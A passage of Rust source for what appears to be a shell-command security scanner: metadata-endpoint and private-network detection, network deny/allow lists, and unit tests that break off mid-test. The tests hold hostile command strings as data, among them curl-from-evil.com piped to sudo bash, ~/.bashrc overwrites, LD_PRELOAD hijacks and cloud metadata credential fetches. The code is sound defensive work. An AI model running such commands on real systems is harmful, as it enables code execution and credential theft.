1111        evidence: vec![Evidence::EnvVar {
1112            name: var_name.to_string(),
1113            value_preview,
1114        }],
1115        human_view: None,
1116        agent_view: None,
1117        mitre_id: None,
1118        custom_rule_id: None,
1119    });
1120}
1121
1122fn redact_env_value(val: &str) -> String {
1123    let prefix = crate::util::truncate_bytes(val, 20);
1124    if prefix.len() == val.len() {
1125        val.to_string()
1126    } else {
1127        format!("{prefix}...")
1128    }
1129}
1130
1131// ---------------------------------------------------------------------------
1132// Phase 9 (free): Network destination detection
1133// ---------------------------------------------------------------------------
1134
1135/// Cloud metadata endpoint IPs that expose instance credentials.
1136const METADATA_ENDPOINTS: &[&str] = &["169.254.169.254", "100.100.100.200"];
1137
1138fn check_host_for_network_issues(arg: &str, findings: &mut Vec<Finding>) {
1139    if let Some(host) = extract_host_from_arg(arg) {
1140        if METADATA_ENDPOINTS.contains(&host.as_str()) {
1141            findings.push(Finding {
1142                rule_id: RuleId::MetadataEndpoint,
1143                severity: Severity::Critical,
1144                title: format!("Cloud metadata endpoint access: {host}"),
1145                description: format!(
1146                    "Command accesses cloud metadata endpoint {host}, \
1147                     which can expose instance credentials and sensitive configuration"
1148                ),
1149                evidence: vec![Evidence::Url {
1150                    raw: arg.to_string(),
1151                }],
1152                human_view: None,
1153                agent_view: None,
1154                mitre_id: None,
1155                custom_rule_id: None,
1156            });
1157        } else if is_private_ip(&host) {
1158            findings.push(Finding {
1159                rule_id: RuleId::PrivateNetworkAccess,
1160                severity: Severity::High,
1161                title: format!("Private network access: {host}"),
1162                description: format!(
1163                    "Command accesses private network address {host}, \
1164                     which may indicate SSRF or lateral movement"
1165                ),
1166                evidence: vec![Evidence::Url {
1167                    raw: arg.to_string(),
1168                }],
1169                human_view: None,
1170                agent_view: None,
1171                mitre_id: None,
1172                custom_rule_id: None,
1173            });
1174        }
1175    }
1176}
1177
1178fn check_network_destination(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1179    for segment in segments {
1180        let Some(ref cmd) = segment.command else {
1181            continue;
1182        };
1183        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1184        if !is_source_command(&cmd_base) {
1185            continue;
1186        }
1187
1188        for arg in &segment.args {
1189            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1190            if trimmed.starts_with('-') {
1191                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1192                if let Some((_flag, value)) = trimmed.split_once('=') {
1193                    check_host_for_network_issues(value, findings);
1194                }
1195                continue;
1196            }
1197
1198            check_host_for_network_issues(trimmed, findings);
1199        }
1200    }
1201}
1202
/// Extract a host/IP from a URL-like command argument.
///
/// Two shapes are recognised:
///
/// * `scheme://[userinfo@]HOST[:PORT][/path][?query][#fragment]` — returns the
///   host (any hostname or IP literal; IPv6 brackets removed).
/// * A bare `HOST[:PORT][/path]` with no scheme — returns the host only when it
///   is a valid IPv4 address or a bracketed IPv6 address.
///
/// Returns `None` when no host can be determined or the host is malformed
/// (empty, or still containing `/` or `[`).
fn extract_host_from_arg(arg: &str) -> Option<String> {
    // The authority component ends at the first '/', '?' or '#'.
    let is_authority_end = |c: char| matches!(c, '/' | '?' | '#');

    // URL with scheme: http://HOST[:PORT]/path
    if let Some((_scheme, after_scheme)) = arg.split_once("://") {
        let authority = after_scheme
            .split(is_authority_end)
            .next()
            .unwrap_or(after_scheme);
        // Userinfo lives inside the authority only. Looking for '@' in the whole
        // remainder would let a path or query such as `/x@other.host` replace the
        // real destination. The last '@' is used as the delimiter, so a stray '@'
        // inside the userinfo cannot shift the host either.
        let host_port = authority
            .rsplit_once('@')
            .map_or(authority, |(_userinfo, rest)| rest);
        let host = strip_port(host_port);
        // Reject obviously invalid hosts (malformed brackets, embedded paths)
        if host.is_empty() || host.contains('/') || host.contains('[') {
            return None;
        }
        return Some(host);
    }

    // Bare host/IP: "169.254.169.254/path" or just "169.254.169.254"
    let host_part = arg.split(is_authority_end).next().unwrap_or(arg);
    let host = strip_port(host_part);

    // Accept valid IPv4 addresses for bare hosts (no scheme)
    if host.parse::<std::net::Ipv4Addr>().is_ok() {
        return Some(host);
    }

    // Accept bracketed IPv6: [::1]
    if host_part.starts_with('[') {
        if let Some(bracket_end) = host_part.find(']') {
            let ipv6 = &host_part[1..bracket_end];
            if ipv6.parse::<std::net::Ipv6Addr>().is_ok() {
                return Some(ipv6.to_string());
            }
        }
    }

    None
}

/// Strip a trailing `:PORT` from a `host[:port]` string.
///
/// * `[v6]:port` / `[v6]` — returns the text between the brackets.
/// * Unbracketed text with more than one colon is assumed to be an IPv6
///   literal and returned unchanged.
/// * Otherwise a suffix after the last colon is removed only when it parses
///   as a `u16`; anything else is returned unchanged.
fn strip_port(host_port: &str) -> String {
    // Handle IPv6: [::1]:8080
    if host_port.starts_with('[') {
        if let Some(bracket_end) = host_port.find(']') {
            return host_port[1..bracket_end].to_string();
        }
    }
    // Don't strip from unbracketed IPv6 (multiple colons)
    let colon_count = host_port.chars().filter(|&c| c == ':').count();
    if colon_count > 1 {
        return host_port.to_string();
    }
    // IPv4 or hostname with single colon: strip trailing :PORT
    if let Some((host, port)) = host_port.rsplit_once(':') {
        if port.parse::<u16>().is_ok() {
            return host.to_string();
        }
    }
    host_port.to_string()
}
1267
/// Report whether `host` is an IPv4 literal in a private-use range:
/// `10.0.0.0/8`, `172.16.0.0/12` or `192.168.0.0/16`.
///
/// Loopback (`127.0.0.0/8`) is not part of those ranges and therefore yields
/// `false` — local traffic has no SSRF/lateral movement risk. Anything that
/// does not parse as an IPv4 address also yields `false`.
fn is_private_ip(host: &str) -> bool {
    host.parse::<std::net::Ipv4Addr>()
        .map(|ip| ip.is_private())
        .unwrap_or(false)
}
1282
/// POSIX fetch commands — eligible for both `tirith run` and `vet` hints.
const POSIX_FETCH_COMMANDS: &[&str] = &["curl", "wget", "http", "https", "xh", "fetch"];

/// PowerShell fetch commands — eligible for `vet` hints only
/// (`tirith run` doesn't support PowerShell interpreter flows).
const POWERSHELL_FETCH_COMMANDS: &[&str] =
    &["iwr", "irm", "invoke-webrequest", "invoke-restmethod"];

/// Source commands that do not fetch URLs (no vet/tirith-run hints).
const NON_FETCH_SOURCE_COMMANDS: &[&str] = &["scp", "rsync"];

/// True when `cmd` appears in any of the three command tables above.
/// The comparison is exact, so callers pass an already-lowercased base name.
fn is_source_command(cmd: &str) -> bool {
    [
        POSIX_FETCH_COMMANDS,
        POWERSHELL_FETCH_COMMANDS,
        NON_FETCH_SOURCE_COMMANDS,
    ]
    .iter()
    .any(|table| table.contains(&cmd))
}

/// True when `cmd` is a URL-fetching command (POSIX or PowerShell table).
fn is_url_fetch_command(cmd: &str) -> bool {
    POSIX_FETCH_COMMANDS
        .iter()
        .chain(POWERSHELL_FETCH_COMMANDS)
        .any(|known| *known == cmd)
}

/// True when a `tirith run` hint applies to `cmd`, i.e. only for POSIX fetch
/// commands (`tirith run` is a shell-script runner).
fn supports_tirith_run_hint(cmd: &str) -> bool {
    POSIX_FETCH_COMMANDS.iter().any(|known| *known == cmd)
}
1310
/// Report whether `s` begins with `http://` or `https://`, ignoring ASCII case
/// in the scheme.
fn starts_with_http_scheme(s: &str) -> bool {
    let bytes = s.as_bytes();
    let schemes: [&[u8]; 2] = [b"https://", b"http://"];
    schemes.iter().any(|scheme| {
        // `get` returns None when the input is shorter than the scheme.
        bytes
            .get(..scheme.len())
            .map_or(false, |head| head.eq_ignore_ascii_case(scheme))
    })
}
1317
/// Strip control characters from a URL so it cannot inject ANSI escapes,
/// newlines, or other terminal-interpreted sequences into the finding
/// description displayed to the user.
///
/// Every character in Unicode category Cc is removed: the C0 range
/// (U+0000–U+001F), DEL (U+007F) and the C1 range (U+0080–U+009F). The C1
/// range matters because it contains 8-bit escape introducers such as
/// U+009B (CSI), which an ASCII-only filter would let through.
fn sanitize_url_for_display(url: &str) -> String {
    url.chars().filter(|c| !c.is_control()).collect()
}
1324
1325/// Extract the first URL from command arguments.
1326fn extract_url_from_args(args: &[String], shell: ShellType) -> Option<String> {
1327    for arg in args {
1328        let normalized = normalize_shell_token(arg.trim(), shell);
1329
1330        if starts_with_http_scheme(&normalized) {
1331            return Some(normalized);
1332        }
1333
1334        // Check --flag=<url> forms (e.g., --url=https://...)
1335        if let Some((_, val)) = normalized.split_once('=') {
1336            if starts_with_http_scheme(val) {
1337                return Some(val.to_string());
1338            }
1339        }
1340    }
1341    None
1342}
1343
1344/// Check command destination hosts against policy network deny/allow lists (Team feature).
1345///
1346/// For each source command (curl, wget, etc.), extracts the destination host and
1347/// checks against deny/allow lists. Allow takes precedence (exempts from deny).
1348pub fn check_network_policy(
1349    input: &str,
1350    shell: ShellType,
1351    deny: &[String],
1352    allow: &[String],
1353) -> Vec<Finding> {
1354    if deny.is_empty() {
1355        return Vec::new();
1356    }
1357
1358    let segments = tokenize::tokenize(input, shell);
1359    let mut findings = Vec::new();
1360
1361    for segment in &segments {
1362        let Some(ref cmd) = segment.command else {
1363            continue;
1364        };
1365        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1366        if !is_source_command(&cmd_base) {
1367            continue;
1368        }
1369
1370        for arg in &segment.args {
1371            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1372            if trimmed.starts_with('-') {
1373                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1374                if let Some((_flag, value)) = trimmed.split_once('=') {
1375                    if let Some(host) = extract_host_from_arg(value) {
1376                        if matches_network_list(&host, allow) {
1377                            continue;
1378                        }
1379                        if matches_network_list(&host, deny) {
1380                            findings.push(Finding {
1381                                rule_id: RuleId::CommandNetworkDeny,
1382                                severity: Severity::Critical,
1383                                title: format!("Network destination denied by policy: {host}"),
1384                                description: format!(
1385                                    "Command accesses {host}, which is on the network deny list"
1386                                ),
1387                                evidence: vec![Evidence::Url {
1388                                    raw: value.to_string(),
1389                                }],
1390                                human_view: None,
1391                                agent_view: None,
1392                                mitre_id: None,
1393                                custom_rule_id: None,
1394                            });
1395                            continue;
1396                        }
1397                    }
1398                }
1399                continue;
1400            }
1401
1402            if let Some(host) = extract_host_from_arg(trimmed) {
1403                // Allow list exempts from deny
1404                if matches_network_list(&host, allow) {
1405                    continue;
1406                }
1407                if matches_network_list(&host, deny) {
1408                    findings.push(Finding {
1409                        rule_id: RuleId::CommandNetworkDeny,
1410                        severity: Severity::Critical,
1411                        title: format!("Network destination denied by policy: {host}"),
1412                        description: format!(
1413                            "Command accesses {host}, which is on the network deny list"
1414                        ),
1415                        evidence: vec![Evidence::Url {
1416                            raw: trimmed.to_string(),
1417                        }],
1418                        human_view: None,
1419                        agent_view: None,
1420                        mitre_id: None,
1421                        custom_rule_id: None,
1422                    });
1423                    return findings;
1424                }
1425            }
1426        }
1427    }
1428
1429    findings
1430}
1431
/// Check if a host matches any entry in a network list.
///
/// An entry matches when one of the following holds:
///
/// * **CIDR** — the entry is an IPv4 CIDR such as `10.0.0.0/8` and `host` is an
///   IPv4 address inside it. If the entry contains `/` but either side fails to
///   parse, the entry falls through to the textual rules below.
/// * **Exact** — the entry equals `host`, ignoring ASCII case.
/// * **Subdomain** — `host` ends with `.` followed by the entry, ignoring ASCII
///   case (entry `example.com` matches `sub.example.com` and `SUB.Example.COM`,
///   but not `notexample.com`).
///
/// Empty entries never match.
fn matches_network_list(host: &str, list: &[String]) -> bool {
    let host_bytes = host.as_bytes();

    for entry in list {
        // An empty entry would otherwise "suffix-match" any host ending in '.'.
        if entry.is_empty() {
            continue;
        }

        // CIDR match: "10.0.0.0/8"
        if entry.contains('/') {
            if let Some(in_range) = cidr_contains(host, entry) {
                if in_range {
                    return true;
                }
                continue;
            }
        }

        // Exact match
        if host.eq_ignore_ascii_case(entry) {
            return true;
        }

        // Subdomain match. Hostnames are case-insensitive, so the tail must be
        // compared the same way as the exact match above. Comparing bytes also
        // avoids slicing `host` at a non-character boundary.
        let entry_bytes = entry.as_bytes();
        if host_bytes.len() > entry_bytes.len() {
            let tail_start = host_bytes.len() - entry_bytes.len();
            if host_bytes[tail_start - 1] == b'.'
                && host_bytes[tail_start..].eq_ignore_ascii_case(entry_bytes)
            {
                return true;
            }
        }
    }
    false
}

/// Check if an IPv4 address is within a CIDR range.
///
/// Returns `Some(true/false)` when `cidr` is `A.B.C.D/N` with `N <= 32` and
/// `host` is an IPv4 address; returns `None` if any part fails to parse.
fn cidr_contains(host: &str, cidr: &str) -> Option<bool> {
    let (network, prefix) = cidr.split_once('/')?;
    let network: std::net::Ipv4Addr = network.parse().ok()?;
    let prefix_len: u32 = prefix.parse().ok()?;
    if prefix_len > 32 {
        return None;
    }
    let host_ip: std::net::Ipv4Addr = host.parse().ok()?;

    // A /0 prefix needs a 32-bit shift, which `checked_shl` reports as overflow;
    // the correct mask in that case is all zeroes.
    let mask = u32::MAX.checked_shl(32 - prefix_len).unwrap_or(0);

    Some(u32::from(network) & mask == u32::from(host_ip) & mask)
}
1488
1489#[cfg(test)]
1490mod tests {
1491    use super::*;
1492
1493    /// Helper: run `check()` with no cwd and Exec context (the common case for tests).
1494    fn check_default(input: &str, shell: ShellType) -> Vec<Finding> {
1495        check(input, shell, None, ScanContext::Exec)
1496    }
1497
1498    #[test]
1499    fn test_pipe_sudo_flags_detected() {
1500        let findings = check_default(
1501            "curl https://evil.com | sudo -u root bash",
1502            ShellType::Posix,
1503        );
1504        assert!(
1505            findings
1506                .iter()
1507                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1508            "should detect pipe through sudo -u root bash"
1509        );
1510    }
1511
1512    #[test]
1513    fn test_pipe_sudo_long_flag_detected() {
1514        let findings = check_default(
1515            "curl https://evil.com | sudo --user=root bash",
1516            ShellType::Posix,
1517        );
1518        assert!(
1519            findings
1520                .iter()
1521                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1522            "should detect pipe through sudo --user=root bash"
1523        );
1524    }
1525
1526    #[test]
1527    fn test_pipe_env_var_assignment_detected() {
1528        let findings = check_default("curl https://evil.com | env VAR=1 bash", ShellType::Posix);
1529        assert!(
1530            findings
1531                .iter()
1532                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1533            "should detect pipe through env VAR=1 bash"
1534        );
1535    }
1536
1537    #[test]
1538    fn test_pipe_env_u_flag_detected() {
1539        let findings = check_default("curl https://evil.com | env -u HOME bash", ShellType::Posix);
1540        assert!(
1541            findings
1542                .iter()
1543                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1544            "should detect pipe through env -u HOME bash"
1545        );
1546    }
1547
1548    #[test]
1549    fn test_dotfile_overwrite_detected() {
1550        let cases = [
1551            "echo malicious > ~/.bashrc",
1552            "echo malicious >> ~/.bashrc",
1553            "curl https://evil.com > ~/.bashrc",
1554            "cat payload > ~/.profile",
1555            "echo test > $HOME/.bashrc",
1556        ];
1557        for input in &cases {
1558            let findings = check_default(input, ShellType::Posix);
1559            eprintln!(
1560                "INPUT: {:?} -> findings: {:?}",
1561                input,
1562                findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
1563            );
1564            assert!(
1565                findings
1566                    .iter()
1567                    .any(|f| f.rule_id == RuleId::DotfileOverwrite),
1568                "should detect dotfile overwrite in: {input}",
1569            );
1570        }
1571    }
1572
1573    #[test]
1574    fn test_pipe_env_s_flag_detected() {
1575        let findings = check_default("curl https://evil.com | env -S bash -x", ShellType::Posix);
1576        assert!(
1577            findings
1578                .iter()
1579                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1580            "should detect pipe through env -S bash -x"
1581        );
1582    }
1583
1584    #[test]
1585    fn test_pipe_sudo_env_detected() {
1586        let findings = check_default(
1587            "curl https://evil.com | sudo env VAR=1 bash",
1588            ShellType::Posix,
1589        );
1590        assert!(
1591            findings
1592                .iter()
1593                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1594            "should detect pipe through sudo env VAR=1 bash"
1595        );
1596    }
1597
1598    #[test]
1599    fn test_httpie_pipe_bash() {
1600        let findings = check_default("http https://evil.com/install.sh | bash", ShellType::Posix);
1601        assert!(
1602            findings
1603                .iter()
1604                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
1605            "should detect HTTPie pipe to bash"
1606        );
1607    }
1608
1609    #[test]
1610    fn test_httpie_https_pipe_bash() {
1611        let findings = check_default("https https://evil.com/install.sh | bash", ShellType::Posix);
1612        assert!(
1613            findings
1614                .iter()
1615                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
1616            "should detect HTTPie https pipe to bash"
1617        );
1618    }
1619
1620    #[test]
1621    fn test_xh_pipe_bash() {
1622        let findings = check_default("xh https://evil.com/install.sh | bash", ShellType::Posix);
1623        assert!(
1624            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
1625            "should detect xh pipe to bash"
1626        );
1627    }
1628
1629    #[test]
1630    fn test_xh_pipe_sudo_bash() {
1631        let findings = check_default(
1632            "xh https://evil.com/install.sh | sudo bash",
1633            ShellType::Posix,
1634        );
1635        assert!(
1636            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
1637            "should detect xh pipe to sudo bash"
1638        );
1639    }
1640
1641    #[test]
1642    fn test_httpie_no_pipe_safe() {
1643        let findings = check_default("http https://example.com/api/data", ShellType::Posix);
1644        assert!(
1645            !findings
1646                .iter()
1647                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
1648            "HTTPie without pipe should not trigger"
1649        );
1650    }
1651
1652    #[test]
1653    fn test_xh_no_pipe_safe() {
1654        let findings = check_default("xh https://example.com/api/data", ShellType::Posix);
1655        assert!(
1656            !findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
1657            "xh without pipe should not trigger"
1658        );
1659    }
1660
1661    #[test]
1662    fn test_export_ld_preload() {
1663        let findings = check_default("export LD_PRELOAD=/evil/lib.so", ShellType::Posix);
1664        assert!(
1665            findings
1666                .iter()
1667                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
1668            "should detect LD_PRELOAD export"
1669        );
1670    }
1671
1672    #[test]
1673    fn test_export_bash_env() {
1674        let findings = check_default("export BASH_ENV=/tmp/evil.sh", ShellType::Posix);
1675        assert!(
1676            findings
1677                .iter()
1678                .any(|f| f.rule_id == RuleId::ShellInjectionEnv),
1679            "should detect BASH_ENV export"
1680        );
1681    }
1682
1683    #[test]
1684    fn test_export_pythonpath() {
1685        let findings = check_default("export PYTHONPATH=/evil/modules", ShellType::Posix);
1686        assert!(
1687            findings
1688                .iter()
1689                .any(|f| f.rule_id == RuleId::InterpreterHijackEnv),
1690            "should detect PYTHONPATH export"
1691        );
1692    }
1693
1694    #[test]
1695    fn test_export_openai_key() {
1696        let findings = check_default("export OPENAI_API_KEY=sk-abc123", ShellType::Posix);
1697        assert!(
1698            findings
1699                .iter()
1700                .any(|f| f.rule_id == RuleId::SensitiveEnvExport),
1701            "should detect OPENAI_API_KEY export"
1702        );
1703    }
1704
1705    #[test]
1706    fn test_export_path_safe() {
1707        let findings = check_default("export PATH=/usr/bin:$PATH", ShellType::Posix);
1708        assert!(
1709            !findings.iter().any(|f| matches!(
1710                f.rule_id,
1711                RuleId::CodeInjectionEnv
1712                    | RuleId::ShellInjectionEnv
1713                    | RuleId::InterpreterHijackEnv
1714                    | RuleId::SensitiveEnvExport
1715            )),
1716            "export PATH should not trigger env var detection"
1717        );
1718    }
1719
1720    #[test]
1721    fn test_env_ld_preload_cmd() {
1722        let findings = check_default(
1723            "env LD_PRELOAD=/evil/lib.so /usr/bin/target",
1724            ShellType::Posix,
1725        );
1726        assert!(
1727            findings
1728                .iter()
1729                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
1730            "should detect LD_PRELOAD via env command"
1731        );
1732    }
1733
1734    #[test]
1735    fn test_curl_metadata_endpoint() {
1736        let findings = check_default(
1737            "curl http://169.254.169.254/latest/meta-data",
1738            ShellType::Posix,
1739        );
1740        assert!(
1741            findings
1742                .iter()
1743                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
1744            "should detect AWS metadata endpoint"
1745        );
1746    }
1747
1748    #[test]
1749    fn test_curl_private_network() {
1750        let findings = check_default("curl http://10.0.0.1/internal/api", ShellType::Posix);
1751        assert!(
1752            findings
1753                .iter()
1754                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
1755            "should detect private network access"
1756        );
1757    }
1758
1759    #[test]
1760    fn test_curl_public_ip_safe() {
1761        let findings = check_default("curl http://8.8.8.8/dns-query", ShellType::Posix);
1762        assert!(
1763            !findings.iter().any(|f| matches!(
1764                f.rule_id,
1765                RuleId::MetadataEndpoint | RuleId::PrivateNetworkAccess
1766            )),
1767            "public IP should not trigger network destination detection"
1768        );
1769    }
1770
1771    #[test]
1772    fn test_metadata_bare_ip() {
1773        let findings = check_default("curl 169.254.169.254/latest/meta-data", ShellType::Posix);
1774        assert!(
1775            findings
1776                .iter()
1777                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
1778            "should detect bare IP metadata endpoint"
1779        );
1780    }
1781
1782    #[test]
1783    fn test_extract_host_from_url() {
1784        assert_eq!(
1785            extract_host_from_arg("http://169.254.169.254/latest"),
1786            Some("169.254.169.254".to_string())
1787        );
1788        assert_eq!(
1789            extract_host_from_arg("http://10.0.0.1:8080/api"),
1790            Some("10.0.0.1".to_string())
1791        );
1792        assert_eq!(
1793            extract_host_from_arg("169.254.169.254/path"),
1794            Some("169.254.169.254".to_string())
1795        );
1796        assert_eq!(
1797            extract_host_from_arg("8.8.8.8"),
1798            Some("8.8.8.8".to_string())
1799        );
1800        assert_eq!(extract_host_from_arg("-H"), None);
1801        assert_eq!(extract_host_from_arg("output.txt"), None);
1802    }
1803
1804    // --- Network policy tests ---
1805
1806    #[test]
1807    fn test_network_policy_deny_exact() {
1808        let deny = vec!["evil.com".to_string()];
1809        let allow = vec![];
1810        let findings = check_network_policy(
1811            "curl https://evil.com/data",
1812            ShellType::Posix,
1813            &deny,
1814            &allow,
1815        );
1816        assert_eq!(findings.len(), 1);
1817        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
1818    }
1819
1820    #[test]
1821    fn test_network_policy_deny_subdomain() {
1822        let deny = vec!["evil.com".to_string()];
1823        let allow = vec![];
1824        let findings = check_network_policy(
1825            "wget https://sub.evil.com/data",
1826            ShellType::Posix,
1827            &deny,
1828            &allow,
1829        );
1830        assert_eq!(findings.len(), 1);
1831        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
1832    }
1833
1834    #[test]
1835    fn test_network_policy_deny_cidr() {
1836        let deny = vec!["10.0.0.0/8".to_string()];
1837        let allow = vec![];
1838        let findings =
1839            check_network_policy("curl http://10.1.2.3/api", ShellType::Posix, &deny, &allow);
1840        assert_eq!(findings.len(), 1);
1841        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
1842    }
1843
1844    #[test]
1845    fn test_network_policy_allow_exempts() {
1846        let deny = vec!["evil.com".to_string()];
1847        let allow = vec!["safe.evil.com".to_string()];
1848        let findings = check_network_policy(
1849            "curl https://safe.evil.com/data",
1850            ShellType::Posix,
1851            &deny,
1852            &allow,
1853        );
1854        assert_eq!(findings.len(), 0, "allow list should exempt from deny");
1855    }
1856
1857    #[test]
1858    fn test_network_policy_no_match() {
1859        let deny = vec!["evil.com".to_string()];
1860        let allow = vec![];
1861        let findings = check_network_policy(
1862            "curl https://example.com/data",
1863            ShellType::Posix,
1864            &deny,
1865            &allow,
1866        );
1867        assert_eq!(findings.len(), 0);
1868    }
1869
1870    #[test]
1871    fn test_network_policy_empty_deny() {
1872        let deny = vec![];
1873        let allow = vec![];
1874        let findings =
1875            check_network_policy("curl https://evil.com", ShellType::Posix, &deny, &allow);
1876        assert_eq!(
1877            findings.len(),
1878            0,
1879            "empty deny list should produce no findings"
1880        );
1881    }
1882
1883    #[test]
1884    fn test_cidr_contains() {
1885        assert_eq!(cidr_contains("10.0.0.1", "10.0.0.0/8"), Some(true));
1886        assert_eq!(cidr_contains("10.255.255.255", "10.0.0.0/8"), Some(true));
1887        assert_eq!(cidr_contains("11.0.0.1", "10.0.0.0/8"), Some(false));
1888        assert_eq!(cidr_contains("192.168.1.1", "192.168.0.0/16"), Some(true));
1889        assert_eq!(cidr_contains("192.169.1.1", "192.168.0.0/16"), Some(false));
1890        assert_eq!(cidr_contains("not-an-ip", "10.0.0.0/8"), None);
1891        assert_eq!(cidr_contains("10.0.0.1", "invalid"), None);
1892    }
1893
1894    #[test]
1895    fn test_matches_network_list_hostname() {
1896        let list = vec!["evil.com".to_string(), "bad.org".to_string()];
1897        assert!(matches_network_list("evil.com", &list));
1898        assert!(matches_network_list("sub.evil.com", &list));
1899        assert!(!matches_network_list("notevil.com", &list));
1900        assert!(!matches_network_list("good.com", &list));
1901    }
1902
1903    #[test]
1904    fn test_flag_value_url_detected_in_network_policy() {
1905        let deny = vec!["evil.com".to_string()];
1906        let allow = vec![];
1907        let findings = check_network_policy(
1908            "curl --url=http://evil.com/data",
1909            ShellType::Posix,
1910            &deny,
1911            &allow,
1912        );
1913        assert_eq!(findings.len(), 1, "should detect denied host in --flag=URL");
1914        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
1915    }
1916
1917    #[test]
1918    fn test_flag_value_url_metadata_endpoint() {
1919        let findings = check(
1920            "curl --url=http://169.254.169.254/latest/meta-data",
1921            ShellType::Posix,
1922            None,
1923            ScanContext::Exec,
1924        );
1925        assert!(
1926            findings
1927                .iter()
1928                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
1929            "should detect metadata endpoint in --flag=URL"
1930        );
1931    }
1932
1933    #[test]
1934    fn test_flag_value_url_private_network() {
1935        let findings = check(
1936            "curl --url=http://10.0.0.1/internal",
1937            ShellType::Posix,
1938            None,
1939            ScanContext::Exec,
1940        );
1941        assert!(
1942            findings
1943                .iter()
1944                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
1945            "should detect private network in --flag=URL"
1946        );
1947    }
1948
1949    #[test]
1950    fn test_strip_port_unbracketed_ipv6() {
1951        assert_eq!(strip_port("fe80::1"), "fe80::1");
1952    }
1953
1954    #[test]
1955    fn test_vet_not_configured_fires_without_supply_chain() {
1956        let dir = tempfile::tempdir().unwrap();
1957        let cwd = dir.path().to_str().unwrap();
1958        let findings = check(
1959            "cargo install serde_json",
1960            ShellType::Posix,
1961            Some(cwd),
1962            ScanContext::Exec,
1963        );
1964        assert!(findings
1965            .iter()
1966            .any(|f| f.rule_id == RuleId::VetNotConfigured));
1967    }
1968
1969    #[test]
1970    fn test_vet_not_configured_suppressed_with_supply_chain() {
1971        let dir = tempfile::tempdir().unwrap();
1972        let sc_dir = dir.path().join("supply-chain");
1973        std::fs::create_dir_all(&sc_dir).unwrap();
1974        std::fs::write(sc_dir.join("config.toml"), "").unwrap();
1975        let cwd = dir.path().to_str().unwrap();
1976        let findings = check(
1977            "cargo install serde_json",
1978            ShellType::Posix,
1979            Some(cwd),
1980            ScanContext::Exec,
1981        );
1982        assert!(!findings
1983            .iter()
1984            .any(|f| f.rule_id == RuleId::VetNotConfigured));
1985    }
1986
1987    #[test]
1988    fn test_vet_not_configured_skips_non_install() {
1989        let dir = tempfile::tempdir().unwrap();
1990        let cwd = dir.path().to_str().unwrap();
1991        let findings = check(
1992            "cargo build",
1993            ShellType::Posix,
1994            Some(cwd),
1995            ScanContext::Exec,
1996        );
1997        assert!(!findings
1998            .iter()
1999            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2000    }
2001
2002    #[test]
2003    fn test_vet_detects_cargo_with_flags() {
2004        let dir = tempfile::tempdir().unwrap();
2005        let cwd = dir.path().to_str().unwrap();
2006        let f1 = check(
2007            "cargo --locked install serde",
2008            ShellType::Posix,
2009            Some(cwd),
2010            ScanContext::Exec,
2011        );
2012        assert!(f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2013        let f2 = check(
2014            "cargo +nightly add tokio",
2015            ShellType::Posix,
2016            Some(cwd),
2017            ScanContext::Exec,
2018        );
2019        assert!(f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2020        let f3 = check(
2021            "cargo -Z sparse-registry install serde",
2022            ShellType::Posix,
2023            Some(cwd),
2024            ScanContext::Exec,
2025        );
2026        assert!(f3.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2027    }
2028
2029    #[test]
2030    fn test_vet_skipped_in_paste_context() {
2031        let dir = tempfile::tempdir().unwrap();
2032        let cwd = dir.path().to_str().unwrap();
2033        let findings = check(
2034            "cargo install serde_json",
2035            ShellType::Posix,
2036            Some(cwd),
2037            ScanContext::Paste,
2038        );
2039        assert!(!findings
2040            .iter()
2041            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2042    }
2043
2044    #[test]
2045    fn test_vet_no_false_positive_on_non_install_subcommand() {
2046        let dir = tempfile::tempdir().unwrap();
2047        let cwd = dir.path().to_str().unwrap();
2048        let f1 = check(
2049            "cargo test --package add",
2050            ShellType::Posix,
2051            Some(cwd),
2052            ScanContext::Exec,
2053        );
2054        assert!(!f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2055        let f2 = check(
2056            "cargo build install",
2057            ShellType::Posix,
2058            Some(cwd),
2059            ScanContext::Exec,
2060        );
2061        assert!(!f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2062    }
2063
2064    #[test]
2065    fn test_vet_detects_cargo_exe_windows_path() {
2066        let dir = tempfile::tempdir().unwrap();
2067        let cwd = dir.path().to_str().unwrap();
2068        let f1 = check(
